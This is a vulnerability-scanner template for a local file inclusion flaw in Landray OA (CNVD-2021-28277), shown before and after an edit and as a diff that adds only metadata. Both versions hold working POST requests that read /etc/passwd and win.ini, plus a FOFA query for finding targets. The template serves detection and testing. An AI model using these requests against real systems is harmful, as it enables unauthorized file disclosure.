cnvd/2021/CNVD-2021-28277.yaml (before)
id: CNVD-2021-28277

info:
  name: Landray-OA Arbitrary File Download
  author: pikpikcu,daffainfo
  severity: high
  reference:
    - https://www.aisoutu.com/a/1432457
    - https://mp.weixin.qq.com/s/TkUZXKgfEOVqoHKBr3kNdw
  metadata:
    fofa-query: app="Landray OA system"
  tags: landray,lfi,cnvd,cnvd2021

requests:
  - raw:
      - |
        POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        var={"body":{"file":"file:///etc/passwd"}}

      - |
        POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        var={"body":{"file":"file:///c://windows/win.ini"}}

    stop-at-first-match: true
    matchers-condition: and
    matchers:

      - type: regex
        regex:
          - "root:.*:0:0:"
          - "for 16-bit app support"
        condition: or

      - type: status
        status:
          - 200

cnvd/2021/CNVD-2021-28277.yaml (after)
id: CNVD-2021-28277

info:
  name: Landray-OA - Local File Inclusion
  author: pikpikcu,daffainfo
  severity: high
  description: Landray-OA is susceptible to local file inclusion.
  reference:
    - https://www.aisoutu.com/a/1432457
    - https://mp.weixin.qq.com/s/TkUZXKgfEOVqoHKBr3kNdw
  metadata:
    fofa-query: app="Landray OA system"
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 8.6
    cwe-id: CWE-22
  tags: landray,lfi,cnvd,cnvd2021

requests:
  - raw:
      - |
        POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        var={"body":{"file":"file:///etc/passwd"}}

      - |
        POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        var={"body":{"file":"file:///c://windows/win.ini"}}

    stop-at-first-match: true
    matchers-condition: and
    matchers:

      - type: regex
        regex:
          - "root:.*:0:0:"
          - "for 16-bit app support"
        condition: or

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/07/06

cnvd/2021/CNVD-2021-28277.yaml (diff)
@@ -1,14 +1,19 @@
 id: CNVD-2021-28277
 
 info:
-  name: Landray-OA Arbitrary File Download
+  name: Landray-OA - Local File Inclusion
   author: pikpikcu,daffainfo
   severity: high
+  description: Landray-OA is susceptible to local file inclusion.
   reference:
     - https://www.aisoutu.com/a/1432457
     - https://mp.weixin.qq.com/s/TkUZXKgfEOVqoHKBr3kNdw
   metadata:
     fofa-query: app="Landray OA system"
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
+    cvss-score: 8.6
+    cwe-id: CWE-22
   tags: landray,lfi,cnvd,cnvd2021
 
 requests:
@@ -42,3 +47,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/06
